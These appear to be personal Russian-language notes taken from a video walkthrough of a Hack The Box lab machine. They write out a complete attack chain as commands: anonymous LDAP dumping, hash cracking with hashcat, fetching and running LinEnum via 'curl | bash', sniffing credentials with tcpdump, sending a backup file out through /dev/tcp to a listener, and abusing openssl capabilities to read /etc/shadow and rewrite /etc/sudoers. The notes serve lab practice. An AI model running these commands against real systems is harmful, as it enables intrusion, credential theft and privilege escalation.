https://www.youtube.com/watch?v=yQgtDoCDAYk&list=PLidcsTyj9JXJKC2u55YVa5aMDBRXsawhr&index=5


389/port ldap 

в hosts - add ip 10.10.10.113 exwmpl.com exempl

gobuster -u http://10.101.10.119 - w /usr/share/wordlist/dirbuster/....  

curl 10.10.10.119
nmap -p 80 10.10.10.119

autentificate to ldap Anonymus
ldapsearch -x -h 10.10.10.119

ldapsearch -x -h 10.10.10.119 -s base nameingcontexs

если выаодиться nameingcontexs то вставляем в следующий запрос

ldapsearch -x -h 10.10.10.119 -b 'dc=lingtweight,dc=htb'

должны получить дамп пользователей и паролей

hashcat --example-hashes
нам нужно определить по какому алгоритму зашифровано, как правило по начальным значениям можно определить как зашифровано
ищим совпадения. 1800 или другой 

./hashcat -m 1800 hashcat/lin.shadow /opt/wordlist/rockyou.txt
hashcat/lin.shadow - передайом файл с хешами(каждый хеш должен начинаться с новой строки)

***************************************************************************************

В данном задании есть возможность зайти под пользователем 10.10.10.4
ssh 10.10.10.4@10.10.10.119
pass:10.10.10.4

анализируем что доступно
ls -la
cat /etc/passwd
смотрим какие пользватели есть и вкаких групах

find . -type f
*****************************************************************************************

запускаеь  LinEnum.sh передадим на сервер python -m SimpleHTTPServer 80

на целевой машине делаем 
curl 10.10.14.3/LinEnum.sh | bash

есть возможность от рута запустить tcpdump

https://gtfobins.github.io/  - https://gtfobins.github.io/gtfobins/tcpdump/ получаем шел
******************************************************************************************
Проверяем 
ssh 10.10.10.4@10.10.10.119 "/usr/sbin/tcpdump -i ens33 -U -s0 -W - 'not port 22'" >> network.ens33.cap
pasword:10.10.10.4

паралельно запускаем wiershark и скармлеваем файл
wieshark network.ens33.cap  - в реальном режиме должен показать трафик

ssh 10.10.10.4@10.10.10.119 "/usr/sbin/tcpdump -i ens33 -U -s0 -W - 'not port 22'" | wireshark -k -i -

для того чтобы увидить трафик нужно запустьть или пинг или на веббраузере перезапустить странички
При анализе получим пароль в кредах правда хеш
*******************************************************************************************

для того чтобы передать файл любой можна использовать команду 
с целевого сервера 
cat backup.7z > /dev/tcp/10.10.14.3/9001  - посилаем на этот порт нажать ентер после запуска на нашей тачки ncat

на своей тачки мы запускаем
ncat -lvnp 9001 > backup.7z

**************
7z x backup.7z

но он запароленый
пробуем zip2john backup.7z
ищим locale 7z2john - для нормальной работы необходим дополнительный пакет apt-install libcompress-raw-lzma-perl

7z2john backup.7z - получаем хеш копируем и идем в hashcat!


./hashcat -m 11600 hashcat/lin.7z /opt/wordlist/rockyou.txt получаем пароль delete от архива

*******************************************
Найдя пароль от ldapsuser1 
зайдя под эти пользователем мы вводим команду 
getcap *

https://gtfobins.github.io/gtfobins/openssl/

смотрим привилегии 
./openssl enc -in /etc/shadow
можем внести правки в файл
./openssl enc -in /etc/sudoers
копируем и правим так как нам нужно
./openssl enc -in /etc/sudoers > sudoers

записываем обратно
cat ./sudoers | ./openssl enc -out /etc/sudoers






